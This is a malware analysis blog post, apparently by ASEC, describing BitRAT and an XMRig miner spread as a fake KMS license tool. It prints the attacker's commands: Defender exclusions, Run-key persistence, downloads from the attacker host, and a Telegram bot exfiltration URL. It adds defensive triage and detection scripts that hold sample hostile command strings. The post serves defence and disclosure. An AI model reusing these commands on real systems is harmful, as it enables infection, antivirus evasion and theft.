BitRAT and XMRig CoinMiner Being Distributed via Windows License Verification Tool – ASEC BLOG

The ASEC analysis team has recently discovered BitRAT and XMRig CoinMiner being distributed disguised as a Windows license verification tool. As covered in previous posts, BitRAT has a history of being distributed on webhards as MS Windows license verification tools and MS Office installers, and the case covered in this post is likely the work of the same attacker. One thing to note is that BitRAT, a remote control tool, is installed in environments where V3 is not installed, while a CoinMiner unrelated to BitRAT is installed when V3 is present.

The initial distribution vector could not be identified, but the malware is currently hosted as a compressed file disguised as a KMS Windows license verification tool on the file hosting website MediaFire.

Figure 1. Malware uploaded to MediaFire

This download URL is being shared to various Korean community websites (see Figures below).

Figure 2. Korean community forum post – 1
Figure 3. Korean community forum post – 2

Decompressing the downloaded file yields the following files. The one named “KMS Tools Unpack.exe” is the malware, disguised as a KMS tool. “KMS Tools Unpack.exe” is a 7z SFX, in other words a self-extracting compressed executable.

Figure 4. Malware inside the compressed file

Like other archivers, 7z supports a self-extracting (SFX) format: compressing files this way produces an .exe executable instead of a .zip or .z archive. It is often used as an installer because of its convenience, since simply running the executable extracts the contents to a path of the creator's choosing. Beyond extracting the included files, 7z SFX also has an additional feature: its configuration can specify a command to be executed during the installation process.

Unlike other malware installers, this file does not contain the actual malware; it contains only a KMS tool. Instead, the following malicious commands are executed during installation, which causes additional malware to be downloaded. One command adds the malware's installation path to the Windows Defender exclusions so that it is not scanned, and another downloads the additional malware from an external server.

Figure 5. Malicious commands executed when 7z SFX is run

The PowerShell command appears to download and execute MSI-format malware named “KMS.msi”, but the downloaded file is actually an executable. When “KMS.msi” runs as a downloader, it has an anti-VM and anti-sandbox feature that checks whether the processes “vmtoolsd” and “asdmon” are running. If they are, it does not download additional malware.
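As an added example (not code from the ASEC post), the following Python script performs the two static checks a triage analyst would want for the files described above: it classifies a sample by magic bytes rather than by extension, so a “.msi” that is really a PE executable is caught, and it extracts the configuration block of a 7z SFX executable to see whether a RunProgram or ExecuteFile directive invokes a shell or PowerShell. The sample bytes are constructed for the example and are not real files; the `;!@Install@!UTF-8!` / `;!@InstallEnd@!` strings are the documented 7z SFX configuration delimiters.

```python
# Added example (not from the ASEC post): static triage for a 7z SFX "installer"
# that runs commands on extraction, and for a download named .msi that is really a PE.
import re

PE_MAGIC = b"MZ"
SEVENZIP_MAGIC = b"7z\xbc\xaf\x27\x1c"              # start of the embedded 7z archive stream
OLE_CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # genuine .msi files are OLE compound documents
SFX_CFG_START = b";!@Install@!UTF-8!"                # 7z SFX configuration delimiters
SFX_CFG_END = b";!@InstallEnd@!"

# Commands that have no business in an installer's RunProgram/ExecuteFile directive.
SUSPICIOUS_CMD = re.compile(
    r"powershell|cmd(?:\.exe)?\s+/c|Add-MpPreference|Invoke-WebRequest|\breg(?:\.exe)?\s+add", re.I
)


def identify(data: bytes) -> str:
    """Classify a file by its magic bytes instead of trusting the extension."""
    if data.startswith(OLE_CFB_MAGIC):
        return "ole-cfb"                       # what a real .msi looks like
    if data.startswith(PE_MAGIC):
        return "pe+7z-sfx" if SEVENZIP_MAGIC in data else "pe"
    return "unknown"


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the file name claims one format and the bytes say another."""
    ext = filename.lower().rsplit(".", 1)[-1]
    kind = identify(data)
    if ext == "msi":
        return kind != "ole-cfb"
    if ext == "exe":
        return not kind.startswith("pe")
    return False


def sfx_config(data: bytes) -> list:
    """Return (directive, value) pairs from an embedded 7z SFX config block, if any."""
    start = data.find(SFX_CFG_START)
    if start < 0:
        return []
    body_start = start + len(SFX_CFG_START)
    end = data.find(SFX_CFG_END, body_start)
    body = data[body_start:end] if end >= 0 else data[body_start:]
    pairs = []
    for line in body.decode("utf-8", "replace").splitlines():
        m = re.match(r'\s*(\w+)\s*=\s*"(.*)"\s*$', line)
        if m:
            pairs.append((m.group(1), m.group(2)))
    return pairs


def sfx_findings(data: bytes) -> list:
    """Commands the SFX would run on extraction that match SUSPICIOUS_CMD."""
    return [
        value for key, value in sfx_config(data)
        if key in ("RunProgram", "ExecuteFile") and SUSPICIOUS_CMD.search(value)
    ]


# Constructed sample: a stub MZ header, an SFX config with one benign and one
# malicious directive, followed by the 7z archive signature. Not a real file.
SFX_SAMPLE = (
    PE_MAGIC + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 32
    + SFX_CFG_START + b"\r\n"
    + b'Title="KMS Tools"\r\n'
    + b'RunProgram="powershell.exe -Command Add-MpPreference -ExclusionPath %TEMP%"\r\n'
    + b'RunProgram="KMSTools.exe"\r\n'
    + SFX_CFG_END + b"\r\n"
    + SEVENZIP_MAGIC + b"\x00\x04" + b"\x00" * 24
)
FAKE_MSI = PE_MAGIC + b"\x00" * 62 + b"PE\x00\x00"   # served as KMS.msi, actually a PE
REAL_MSI = OLE_CFB_MAGIC + b"\x00" * 24               # what a genuine .msi starts with

if __name__ == "__main__":
    print("KMS Tools Unpack.exe:", identify(SFX_SAMPLE), sfx_findings(SFX_SAMPLE))
    print("KMS.msi mismatch:", extension_mismatch("KMS.msi", FAKE_MSI))
    print("genuine msi mismatch:", extension_mismatch("setup.msi", REAL_MSI))
```

On a real sample, read the file into `data` and call `identify`, `extension_mismatch` and `sfx_findings`; the first two catch the “.msi that is a PE” trick, and the last surfaces the install-time command without having to run the installer.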

It then uses the following commands to exclude the malware's download path and processes from Windows Defender scanning.

> powershell.exe "-Command
  Add-MpPreference -ExclusionPath 'C:\Users\[User Name]\AppData\Local\Temp';
  Add-MpPreference -ExclusionPath 'C:\Users\[User Name]\AppData\Local\Google\software_reporter_tool.exe';
  Add-MpPreference -ExclusionProcess 'InstallUtil.exe';
  Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe';
  Add-MpPreference -ExclusionProcess 'svchost.exe';
  Add-MpPreference -ExclusionPath 'C:\Users\[User Name]\AppData\Local\Microsoft\Windows\INetCache\IE'"

The downloaded malware is saved to the path “%LOCALAPPDATA%\Google\software_reporter_tool.exe”, and that path is registered under a Run key so that it is executed again after a reboot.

> cmd.exe "/c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v Google /t REG_SZ /d C:\Users\[User Name]\AppData\Local\Google\software_reporter_tool.exe /f"

“KMS.msi” has another characteristic: the malware installed on the user's PC differs depending on whether V3 is installed. The presence of V3 is determined by checking whether the process “ASDSvc” is running.

Figure 6. Branch determined depending on the presence of V3 anti-malware product

Into the path “%LOCALAPPDATA%\Google\software_reporter_tool.exe”, “obieznne.msi” is downloaded if V3 is not present, and “wniavctm.msi” is downloaded if V3 is present. The executed malware runs disguised as a Google Chrome browser update, which makes it difficult for regular users to notice the suspicious process.

> powershell.exe "Invoke-WebRequest hxxp://purposedesigns[.]net:443/obieznne.msi -OutFile C:\Users\[User Name]\AppData\Local\Google\software_reporter_tool.exe"
> powershell.exe "Invoke-WebRequest hxxp://purposedesigns[.]net:443/wniavctm.msi -OutFile C:\Users\[User Name]\AppData\Local\Google\software_reporter_tool.exe"

After this point, “KMS_Tool.msi” is downloaded and installed. We could not examine the file since it can no longer be downloaded, but it is likely a KMS tool.

> powershell.exe "Invoke-WebRequest hxxp://purposedesigns[.]net:443/KMS_Tool.msi -OutFile C:\Users\[User Name]\AppData\Local\Temp\zxoeqxat.msi; cmd /c C:\Users\[User Name]\AppData\Local\Temp\zxoeqxat.msi"
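As an added example (not from the ASEC post), here is a small Python detection pass over constructed process-creation events modelled on the command lines above: it flags the Defender exclusion, the Policies\Explorer\Run persistence, a download whose URL ends in .msi but is written to an .exe, and a software_reporter_tool.exe running outside Chrome's own directory. The events, the user name “alice”, the placeholder domain example.invalid and the Image/CommandLine field names are constructed for the example; the one assumption about legitimate software is that Chrome's genuine software_reporter_tool.exe lives under its SwReporter directory, so a copy directly under %LOCALAPPDATA%\Google\ is treated as a masquerade.

```python
# Added example (not from the ASEC post): flag the Defender-exclusion, Run-key
# persistence, .msi-served-as-.exe download and masquerading-path behaviours
# described above in process-creation telemetry.
import re

# Each rule is matched against the CommandLine field.
COMMAND_RULES = {
    "defender_exclusion_added": re.compile(
        r"Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)", re.I),
    "run_key_persistence": re.compile(
        r"\breg(?:\.exe)?\s+add\s+\S*\\CurrentVersion\\(?:Policies\\Explorer\\)?Run\b", re.I),
    "msi_url_saved_as_exe": re.compile(
        r"Invoke-WebRequest\s+\S+\.msi\b.*-OutFile\s+\S+\.exe\b", re.I),
}

# Assumption (not from the post): Chrome's genuine software_reporter_tool.exe runs
# from ...\Google\Chrome\User Data\SwReporter\<version>\, never directly under \Google\.
CHROME_REPORTER_DIR = "\\google\\chrome\\user data\\swreporter\\"


def outside_chrome_reporter(image: str) -> bool:
    """True for a software_reporter_tool.exe that is not in Chrome's SwReporter tree."""
    p = image.lower()
    return p.endswith("\\software_reporter_tool.exe") and CHROME_REPORTER_DIR not in p


def evaluate(events: list) -> list:
    """Return (event index, rule name) for every rule each event triggers."""
    hits = []
    for i, ev in enumerate(events):
        for name, rx in COMMAND_RULES.items():
            if rx.search(ev["CommandLine"]):
                hits.append((i, name))
        if outside_chrome_reporter(ev["Image"]):
            hits.append((i, "software_reporter_tool_outside_chrome"))
    return hits


# Constructed events (Sysmon-style Image/CommandLine fields); user "alice" and
# the domain example.invalid are placeholders, not values from the post.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -Command Add-MpPreference -ExclusionPath "
                    r"'C:\Users\alice\AppData\Local\Temp'; Add-MpPreference -ExclusionProcess 'svchost.exe'"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run "
                    r"/v Google /t REG_SZ /d C:\Users\alice\AppData\Local\Google\software_reporter_tool.exe /f"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Invoke-WebRequest http://example.invalid/obieznne.msi "
                    r"-OutFile C:\Users\alice\AppData\Local\Google\software_reporter_tool.exe"},
    {"Image": r"C:\Users\alice\AppData\Local\Google\software_reporter_tool.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Google\software_reporter_tool.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Each of the first four events trips exactly one rule and the notepad event trips none; on real telemetry the same regexes apply to the command-line field of Sysmon Event ID 1 or Security Event 4688 (with command-line auditing enabled), and the exclusion rule pairs naturally with Windows Defender's own Event ID 5007 configuration-change records.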

Even if no KMS tool is installed by that step, the “KMS Tools Unpack.exe” that was launched is deleted and replaced by a KMS tool called “KMSTools.exe” with the same icon. Because the user can use the newly generated KMS tool, they are unlikely to notice that they were infected with malware.

Figure 7. KMS tool generated when malware is executed

Lastly, the downloader uses the Telegram Bot API to send basic information about the infected system before deleting itself.

Figure 8. Network connection of malware
  • Telegram API used to send infected system information: hxxps://api.telegram[.]org/bot5538205016:AAH7S9IGtFpb6RbC8W2TfNkjD7Cj_3qxCnI/sendMessage

Which malware is installed next depends on whether V3 is installed. When V3 is not present, “obieznne.msi” is installed; it is an injector that launches the legitimate program InstallUtil.exe and injects the actual BitRAT into it. BitRAT thus disguises itself as a normal process by operating within the memory of the InstallUtil process.

BitRAT is a RAT that provides attackers with various features once installed. Besides basic control features such as process, service and file management and remote command execution, it also offers extra options such as various info-stealing features, HVNC, remote desktop, coin mining, and proxying.

Figure 9. BitRAT C&C Communication

An XMRig CoinMiner is installed instead of BitRAT in environments where V3 is present. XMRig runs within the memory of svchost.exe, a legitimate program, so regular users may struggle to identify the cause even if their computer slows down due to the mining.

Figure 10. XMRig CoinMiner
  • Mining pool URL: asia.randomx-hub.miningpoolhub[.]com:20580
  • User: “coinzz88.test”
  • Pass: “”

As the malware is being actively distributed via Korean file-sharing websites, users should be cautious when running executables downloaded from such sites. It is recommended to download products such as utility programs and games from their official websites. Users should also apply the latest patches for their OS and programs such as web browsers, and update V3 to the latest version to prevent malware infection in advance.

[File Detection]
– Downloader/Win.Agent.C5222945 (2022.08.14.00)
– Downloader/Win.MSIL.R510666 (2022.08.14.03)
– Trojan/Win.Generic.C5223158 (2022.08.14.02)
– CoinMiner/Win.XMRig.C5223211 (2022.08.15.00)

[Behavior Detection]
– Execution/MDP.Powershell.M1185
– Malware/MDP.Download.M1197
– Malware/MDP.DriveByDownload.M1298
– Execution/MDP.Powershell.M4192

[IOC]
MD5

– 74120cfeca3b003c6dbf81707216c22c (Installer – KMS Tools Unpack.exe)
– ce985a31420169f002706fb46d5e8cd0 (Downloader – KMS.msi)
– d6cb1c1dd51917214ff41b76e904769e (BitRAT – obieznne.msi)
– 4e5cb75c3c99f30c7a22b940fd107505 (XMRig CoinMiner – wniavctm.msi)

Download URL
– hxxp://purposedesigns[.]net:443/KMS.msi (Downloader)
– hxxp://purposedesigns[.]net:443/obieznne.msi (BitRAT)
– hxxp://purposedesigns[.]net:443/wniavctm.msi (XMRig CoinMiner)

C&C
– 147.189.161[.]248:80 (BitRAT)


Source: https://asec.ahnlab.com/en/37939/